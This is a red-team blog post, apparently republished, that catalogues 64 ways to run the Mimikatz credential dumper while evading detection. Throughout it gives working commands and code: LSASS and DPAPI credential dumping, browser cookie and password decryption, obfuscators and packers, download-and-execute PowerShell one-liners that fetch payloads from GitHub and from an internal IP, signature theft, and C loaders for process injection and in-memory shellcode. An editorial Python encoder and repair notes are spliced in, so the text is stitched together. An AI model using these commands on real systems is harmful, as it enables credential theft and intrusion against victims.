Red Team | 64 Ways to Execute Mimikatz
2023-04-16 21:02:50 Author: Z2O安全攻防 Reads: 24

Disclaimer

This article is for technical discussion and learning only. Any direct or indirect consequences or losses caused by using the information it provides are the responsibility of the user alone; the author accepts no liability for them.

Use it only for testing targets you are authorized to test. The author accepts no responsibility for testing of unauthorized targets; that responsibility lies entirely with the user.

Article

go-mimikatz

go build
./go-mimikatz

https://github.com/vyrus001/go-mimikatz

Rusty Mimikatz

cargo build --release
./target/release/mimikatz-rs

https://github.com/memN0ps/mimikatz-rs

MimikatzFUD

.\Invoke-M1m1fud2.ps1

https://github.com/HernanRodriguez1/MimikatzFUD

pypykatz

pip install pypykatz
pypykatz live lsa                   # parse LSASS on the local host (requires an elevated shell)
pypykatz lsa minidump ./lsass.dmp   # parse an LSASS minidump captured elsewhere, fully offline

https://github.com/skelsec/pypykatz

BetterSafetyKatz

.\BetterSafetyKatz.exe --DumpCreds
.\BetterSafetyKatz.exe --Minidump "C:\Windows\Temp\lsass.dmp" --DumpCreds
.\BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
.\BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds

https://github.com/Flangvik/BetterSafetyKatz

CopyCat

.\CopyCat.exe --dump --local
.\CopyCat.exe --memory "C:\Windows\Temp\memdump.raw" --dump
.\CopyCat.exe --hibernation "C:\Windows\hiberfil.sys" --dump
.\CopyCat.exe --dump --target "192.168.1.100" --username "domain\username" --password "password123"

https://github.com/mobdk/CopyCat

PyFuscation

python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1

https://github.com/CBHue/PyFuscation

Invoke-Cats

Invoke-Cats -pwds
Invoke-Cats -certs
Invoke-Cats -CustomCommand

https://github.com/DanMcInerney/Invoke-Cats

WinBoost

csc.exe /platform:x64 /target:exe /unsafe winboost.cs

https://github.com/mobdk/WinBoost

mimidogz

.\Invoke-Mimidogz.ps1

https://github.com/fir3d0g/mimidogz

CoreClass

1. In Visual Studio, right-click the project and choose "Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.
2. Add a reference to `System.Management.Automation.dll`: right-click the project in Solution Explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies", search for "System.Management.Automation", select it and click "Add".

https://github.com/mobdk/CoreClass

SharpMimikatz

SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

https://github.com/XTeam-Wing/SharpMimikatz

Invoke-Obfuscation

Set-ExecutionPolicy Unrestricted
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath C:\Path\To\MyScript.ps1 -Command 'Token\All\1' -Quiet

https://github.com/danielbohannon/Invoke-Obfuscation

SimpleMimikatzObfuscator

Commands.txt

https://github.com/DimopoulosElias/SimpleMimikatzObfuscator

ClickOnceKatz

pip install pycryptodome requests
python build.py
Host the "publish" directory on a web server or file share reachable from the target machine.
On the target machine, open the URL of the ClickOnce package in a web browser.

https://github.com/sinmygit/ClickOnceKatz

pymemimporter

import base64
import pymemimporter

# Load the base64-encoded module into memory
encoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE'
module_data = base64.b64decode(encoded_module)

# Import the module from memory
mem_importer = pymemimporter.PyMemImporter()
loaded_module = mem_importer.load_module('<module_name>', module_data)

Produce the base64 blob for the module, then run the loader script:

base64 -w0 <module_name>.py > <module_name>.base64
python <script_name>.py

https://github.com/n1nj4sec/pymemimporter

SharpDPAPI

Build SharpDPAPI.sln with Visual Studio (.NET Framework project), then:

.\SharpDPAPI.exe masterkeys                                        # decrypt the current user's DPAPI master keys
.\SharpDPAPI.exe backupkey /server:dc.domain.local /file:key.pvk   # retrieve the domain DPAPI backup key (needs Domain Admin)
.\SharpDPAPI.exe triage /pvk:key.pvk                               # decrypt credential and vault blobs with the backup key

SharpDPAPI never touches LSASS: it decrypts DPAPI-protected secrets on disk, which is why it survives where LSASS readers are blocked.

https://github.com/GhostPack/SharpDPAPI

Plog

privilege::debug
sekurlsa::Plog

https://github.com/GamehunterKaan/Plog

StegoKatz

.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>
.\StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt

https://github.com/r13mann/StegoKatz

LoadMimikatzWithDinvoke.cs

mimi.bat
.\rundll32-hijack.ps1

https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs

mimikatz-bypass

Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1
Set-ExecutionPolicy Unrestricted
.\mimikatz-bypass.ps1

https://github.com/corneacristian/mimikatz-bypass

Utils

dotnet build -r win10-x64
katz.exe <MIMIKATZ_COMMAND>

https://github.com/ITh4cker/Utils

Eyeworm

python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>
python3 eyeworm.py -i <INPUT_FILE> -p <PAYLOAD_FILE> -o <OUTPUT_FILE>

https://github.com/imsellbaox/Eyeworm

drunkenkatz

beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"

https://github.com/ap3r/drunkenkatz

CallBack

python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>

https://github.com/mobdk/CallBack

mimikatz-byPass-Huorong

python mimikatz_byPass_Huorong.py

https://github.com/q1ya/mimikatz-byPass-Huorong

mimikatz_bypass

python mimikatz_bypass.py

https://github.com/wangfly-me/mimikatz_bypass

HTML-mimikatz-

cmd.exe mimikatz.html

https://github.com/vipserver/HTML-mimikatz-

Mimikatz.exe-in-JS

cmd.exe mimikatz.js

https://github.com/hardw00t/Mimikatz.exe-in-JS

-Have-You-Seen-These-Katz-

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-

MimiRunner

rundll32 *.log,#1

https://github.com/mobdk/MimiRunner

Mimikatz-PE-Injection

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

Note: in '/out:katz.exe katz.cs' above, 'katz.cs' must be the path to which PowerShell originally downloaded the .cs file.

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \\share_ip\share_name\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\\katz.log && cd %temp% && del %temp%\\katz.cs

https://github.com/analyticsearch/Mimikatz-PE-Injection

ninifox

.\Invoke-NiNifox.ps1

https://github.com/scottjosh/ninifox

Chexport

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data For Account" /unprotect
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

https://github.com/GamehunterKaan/Chexport

mimik

mimikatz.exe
mprotected.exe
mprotected.jpg.exe
mprotected.jpg.7z

https://github.com/MisterLobster22/mimik

my-obfuscated-mimikatz

eric.ps1

https://github.com/lazaars/my-obfuscated-mimikatz

Invoke-Mimikatz-W10

.\Invoke-Mimikatz.ps1

https://github.com/VDA-Labs/Invoke-Mimikatz-W10

MimiVader

python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py

https://github.com/lawja/MimiVader

Invoke-Mimikatz

.\Invoke-Mimikatz

https://github.com/syn-ack-zack/Invoke-Mimikatz

Invoke-Mimikatz

.\invokemimikatz.ps1

https://github.com/dfirdeferred/Invoke-Mimikatz

mimikatz_bypass

.\XInvoke-Mimikatz.ps1
.\wi10_Invoke-Mimikatz.ps1

https://github.com/izj007/mimikatz_bypass

JS_MimiKatzDropper

cscript.exe dropper.js

https://github.com/leinn32/JS_MimiKatzDropper

mimicats

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1'); Invoke-Cats -Command '"privilege::debug"'

https://github.com/Moon1705/mimicats

XorPacker

python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED

https://github.com/tmenochet/XorPacker

PEzor

PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'

https://github.com/phra/PEzor

AtomPePacker

PePacker.exe mimikatz.exe -e

https://github.com/NUL0x4C/AtomPePacker

Nim-RunPE

nim c -d:args NimRunPE.nim

https://github.com/S3cur3Th1sSh1t/Nim-RunPE

Nimcrypt2

nim c -d:release nimcrypt.nim
./nimcrypt -f mimikatz.exe -t pe -o mimikatz-packed.exe   # -t selects the input type: csharp, raw (shellcode) or pe

https://github.com/icyguider/Nimcrypt2

ProtectMyTooling

py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

https://github.com/mgeeky/ProtectMyTooling

xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/the-xentropy/xencrypt

BetterXencrypt

Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/GetRektBoy724/BetterXencrypt

AES-Encoder

Invoke-AES-Encoder -InFile invoke-mimikatz.ps1 -OutFile aesmimi.ps1

https://github.com/Chainski/AES-Encoder

mortar

./encryptor -f mimikatz.exe -o bin.enc
deliver.exe -d -c sekurlsa::logonpasswords -f bin.enc

https://github.com/0xsp-SRD/mortar

.NET-Crypter

GUI: click "Browse Executable" and pick the binary, then "Generate Encryption".

https://github.com/roast247/.NET-Crypter

Custom mods + Invoke-Obfuscation

sed -i -e '/<#/,/#>/c\\' "$1"
sed -i -e 's/^[[:space:]]*#.*$//g' "$1"
sed -i -e 's/Invoke-Mimikatz/RainbowsAndUnicorns/g' "$1"
sed -i -e 's/DumpCreds/MoreRainbows/g' "$1"
Invoke-Obfuscation -ScriptPath './Invoke-Mimikatz.ps1' -Command 'Token\All\1\Out full_power.ps1' -Quiet
Invoke-Obfuscation -ScriptPath '.\2.IM_critical_words.ps1' -Command 'Token\Variable\1' -Quiet > final.ps1
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.104:8000/final.ps1'); RainbowsAndUnicorns -MoreRainbows

https://github.com/newlog/fud_mimikatz_talk

Obfuscated_Invoke-Mimikatz

sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force
Import-Module .\obfuscat_Invoke-Mimikatz.ps1
Invoke-LSASSscraper

https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz

mimikatz_encoded

certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/mobx26/mimikatz_encoded

Encrypted_Mimikatz

.\decrypt.ps1
.\mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/Sombody101/Encrypted_Mimikatz

SigThief

sigthief.py -i c:\Windows\System32\consent.exe -t mimikatz.exe -o MSCredentialTool.exe

https://github.com/secretsquirrel/SigThief

memory+suspended

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* Command line to run. It is held XOR-encoded in memory and decoded only
   immediately before the process is started. */
const char* cmd = "powershell.exe -windowstyle hidden -command \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"";

#define XOR_KEY 0x41

/* XOR every byte with the key; the same call encodes and decodes. An explicit
   length is used because a byte equal to the key XORs to 0x00, which would stop
   a strlen()-based loop early. */
void obfuscate(char* str, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        str[i] ^= XOR_KEY;
    }
}

int main()
{
    size_t len = strlen(cmd);

    /* Work on a heap copy: XORing the string literal in place writes to
       read-only memory and crashes. */
    char* buf = (char*)malloc(len + 1);
    if (buf == NULL) {
        return 1;
    }
    memcpy(buf, cmd, len + 1);

    obfuscate(buf, len);   /* encoded while it sits in memory ...          */
    obfuscate(buf, len);   /* ... decoded immediately before it is needed  */

    /* Create the PowerShell process suspended, then release it. CreateProcessA
       may modify the command-line buffer, which is why it is a writable copy. */
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);

    if (!CreateProcessA(NULL, buf, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW,
                        NULL, NULL, &si, &pi)) {
        printf("Error creating process. Error code: %lu\n", GetLastError());
        free(buf);
        return 1;
    }

    /* The decoded command is not needed once the process exists; scrub it. */
    SecureZeroMemory(buf, len);
    free(buf);

    ResumeThread(pi.hThread);
    WaitForSingleObject(pi.hProcess, INFINITE);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}

XOR’d with 0xFF

#include <iostream>
#include <iomanip>
#include <cstring>

// XOR every byte of a NUL-terminated string with 0xFF; calling it twice restores
// the original. Any input byte equal to the key becomes 0x00 and terminates the
// string early, so this form is only safe for plain ASCII input.
void obfuscate(char* s) {
    for (int i = 0; s[i]; i++) {
        s[i] = s[i] ^ 0xFF;
    }
}

int main() {
    char* str = new char[20];
    strcpy(str, "password123");

    // Obfuscate the string
    obfuscate(str);

    // Encoded ASCII bytes are all >= 0x80, so print them as hex rather than raw
    for (int i = 0; str[i]; i++) {
        std::cout << std::hex << std::setw(2) << std::setfill('0')
                  << (static_cast<unsigned int>(str[i]) & 0xFF);
    }
    std::cout << std::endl;

    // Restore and print the original string
    obfuscate(str);
    std::cout << str << std::endl;

    delete[] str;
    return 0;
}

XORing each character with the value 0xAA

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

#define XOR_KEY 0xAA

/* XOR a buffer of known length with a single-byte key; the same call decodes. */
static void xor_buf(char* buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= XOR_KEY;
    }
}

int main()
{
    char str1[] = "mimikatz.exe";
    char str2[] = "powershell.exe";
    char str3[] = "cmd.exe /c mimikatz.exe";

    size_t len1 = strlen(str1);
    size_t len2 = strlen(str2);
    size_t len3 = strlen(str3);

    /* Encode the strings so they are not present in plaintext at rest */
    xor_buf(str1, len1);
    xor_buf(str2, len2);
    xor_buf(str3, len3);

    /* Stage the encoded strings in a private heap region. They are data, not
       code, so the page is RW rather than RWX; jumping into it would crash. */
    size_t total = sizeof(str1) + sizeof(str2) + sizeof(str3);
    char* mem = (char*)VirtualAlloc(NULL, total, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL) {
        printf("VirtualAlloc failed. Error code: %lu\n", GetLastError());
        return 1;
    }
    memcpy(mem, str1, sizeof(str1));
    memcpy(mem + sizeof(str1), str2, sizeof(str2));
    memcpy(mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3));

    /* Decode a string in place right before use, then re-encode it */
    char* cmdline = mem + sizeof(str1) + sizeof(str2);
    xor_buf(cmdline, len3);
    printf("%s\n", cmdline);   /* cmd.exe /c mimikatz.exe */
    xor_buf(cmdline, len3);

    VirtualFree(mem, 0, MEM_RELEASE);
    return 0;
}

Decoding and storing it in memory

#include <iostream>
#include <cstring>
#include <windows.h>

int main()
{
    // Payload written into the target. The bytes below are the page's placeholder,
    // not executable code, and they contain embedded 0x00 bytes, so sizing them
    // with strlen() would stop at the first NUL. Real position-independent shellcode
    // goes here, and its length always comes from sizeof(), never strlen().
    const char encodedCmd[] = "\x44\x43\x4D\x53\x63\x72\x61\x70\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x62\x00\x2D\x6E\x6F\x70\x23\x00\x2D\x6E\x6F\x70\x69\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x77\x00\x2D\x70\x00\x2D\x65\x00\x2D\x74\x00\x2D\x72\x00\x2D\x75\x00\x2D\x6E\x00\x20\x22\x26\x28\x2A\x2C\x2E\x30\x32\x34\x36\x38\x3A\x3C\x3E\x40\x42\x44\x46\x48\x4A\x4C\x4E\x50\x52\x54\x56\x58\x5A\x5C\x5E\x60\x62\x64\x66\x68\x6A\x6C\x6E\x70\x72\x74\x76\x78\x7A\x7C\x7E\x80\x82\x84\x86\x88\x8A\x8C\x8E\x90\x92\x94\x96\x98\x9A\x9C\x9E\xA0\xA2\xA4\xA6\xA8\xAA\xAC\xAE\xB0\xB2\xB4\xB6\xB8\xBA\xBC\xBE\xC0\xC2\xC4\xC6\xC8\xCA\xCC\xCE\xD0\xD2\xD4\xD6\xD8\xDA\xDC\xDE\xE0\xE2\xE4\xE6\xE8\xEA\xEC\xEE\xF0\xF2\xF4\xF6\xF8\xFA\xFC\xFE\x00\x22";
    SIZE_T payloadLen = sizeof(encodedCmd) - 1;   // drop the implicit terminating NUL

    // Pick the target by window title and resolve its PID
    HWND hwnd = FindWindowA(NULL, "Window Name");
    if (hwnd == NULL) {
        std::cerr << "Window not found" << std::endl;
        return 1;
    }
    DWORD pid = 0;
    GetWindowThreadProcessId(hwnd, &pid);

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hProc == NULL) {
        std::cerr << "OpenProcess failed: " << GetLastError() << std::endl;
        return 1;
    }

    // Allocate RWX memory in the target, copy the payload in, and run it on a remote thread
    LPVOID allocSpace = VirtualAllocEx(hProc, NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (allocSpace == NULL || !WriteProcessMemory(hProc, allocSpace, encodedCmd, payloadLen, NULL)) {
        std::cerr << "Allocate/write failed: " << GetLastError() << std::endl;
        CloseHandle(hProc);
        return 1;
    }

    HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)allocSpace, NULL, 0, NULL);
    if (hThread == NULL) {
        std::cerr << "CreateRemoteThread failed: " << GetLastError() << std::endl;
        CloseHandle(hProc);
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);

    CloseHandle(hThread);
    CloseHandle(hProc);
    return 0;
}

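The three XOR snippets above (keys 0x41, 0xFF and 0xAA) and the remote-thread loader all share one hazard: any input byte equal to the key encodes to 0x00, and the C code sizes its buffers with strlen(), so the payload is silently cut short at that byte. The script below is an added example written for this page, not code from the original article. It encodes a constructed command with a single-byte key, emits the "\xNN" literal form that a C const char* can hold, verifies the round trip, and refuses keys that would embed a NUL; safe_keys() lists the keys that are usable for a given input.

```python
"""
Single-byte XOR encoding for strings embedded in a C loader. Added example for
this page; not code from the original article. The command in __main__ is
constructed, not a payload from the page.
"""


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte. The same call encodes and decodes."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def strlen(data: bytes) -> int:
    """Length that C's strlen() would report: the bytes before the first 0x00."""
    i = data.find(0)
    return len(data) if i < 0 else i


def safe_keys(data: bytes) -> list:
    """Keys 0x01..0xFF that produce no 0x00 byte, i.e. keys that do not occur in the data."""
    return [k for k in range(1, 256) if k not in data]


def to_c_literal(data: bytes) -> str:
    """Render bytes as a C string literal made of \\xNN escapes."""
    return '"' + "".join(f"\\x{b:02X}" for b in data) + '"'


def encode_for_c(cmd: str, key: int) -> str:
    """Encode cmd with key and return the C literal, refusing keys that embed a NUL."""
    data = cmd.encode("ascii")
    enc = xor_bytes(data, key)
    if strlen(enc) != len(enc):
        raise ValueError(
            f"key 0x{key:02X} turns byte {strlen(enc)} into 0x00; strlen() would truncate there"
        )
    if xor_bytes(enc, key) != data:      # the round trip must restore the input exactly
        raise RuntimeError("decode mismatch")
    return to_c_literal(enc)


if __name__ == "__main__":
    cmd = "powershell.exe -c sekurlsa::logonpasswords"   # constructed sample input
    print(encode_for_c(cmd, 0x41))
    bad = sorted(set(range(1, 256)) - set(safe_keys(cmd.encode("ascii"))))
    print("keys to avoid for this input:", [hex(k) for k in bad])
```

The same check applies to the longer literal in the remote-thread loader above: it already contains \x00 bytes, so the only correct size for it is sizeof(literal) - 1, which is what the repaired loader uses.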
Inject and execute Mimikatz in memory

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The file must contain position-independent code, e.g. mimikatz converted with
   one of the PE-to-shellcode packers listed above. A raw mimikatz.exe will not run
   this way: its first bytes are the MZ header, and a PE needs its sections mapped,
   relocations applied and imports resolved before its entry point can be called. */
#define MIMIKATZ_PATH "C:\\path\\to\\mimikatz.exe"

int main()
{
    // Read the payload into a heap buffer
    HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("CreateFile failed. Error code: %lu\n", GetLastError());
        return 1;
    }
    DWORD dwFileSize = GetFileSize(hFile, NULL);
    BYTE* pbFileData = (BYTE*)malloc(dwFileSize);
    DWORD dwBytesRead = 0;
    if (pbFileData == NULL || !ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL) || dwBytesRead != dwFileSize) {
        printf("ReadFile failed. Error code: %lu\n", GetLastError());
        CloseHandle(hFile);
        free(pbFileData);
        return 1;
    }
    CloseHandle(hFile);

    // Allocate an executable region and copy the payload into it
    LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpMem == NULL) {
        printf("VirtualAlloc failed. Error code: %lu\n", GetLastError());
        free(pbFileData);
        return 1;
    }
    memcpy(lpMem, pbFileData, dwFileSize);
    free(pbFileData);

    // Run the payload on a new thread that starts at offset 0 of the buffer
    DWORD dwExitCode = 0;
    DWORD dwThreadId = 0;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId);
    if (hThread == NULL) {
        printf("CreateThread failed. Error code: %lu\n", GetLastError());
        VirtualFree(lpMem, 0, MEM_RELEASE);
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);
    GetExitCodeThread(hThread, &dwExitCode);
    CloseHandle(hThread);

    // Free the allocated memory
    VirtualFree(lpMem, 0, MEM_RELEASE);
    return 0;
}



Source: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247493917&idx=1&sn=4a52d05848083a26c590bed5f1869cab&chksm=ceab025df9dc8b4b27c69535bda58011c65b0b9d5cc39fef53230c7fe308cc85f10c2ed454e3#rd
For copyright complaints contact: admin#unsafe.sh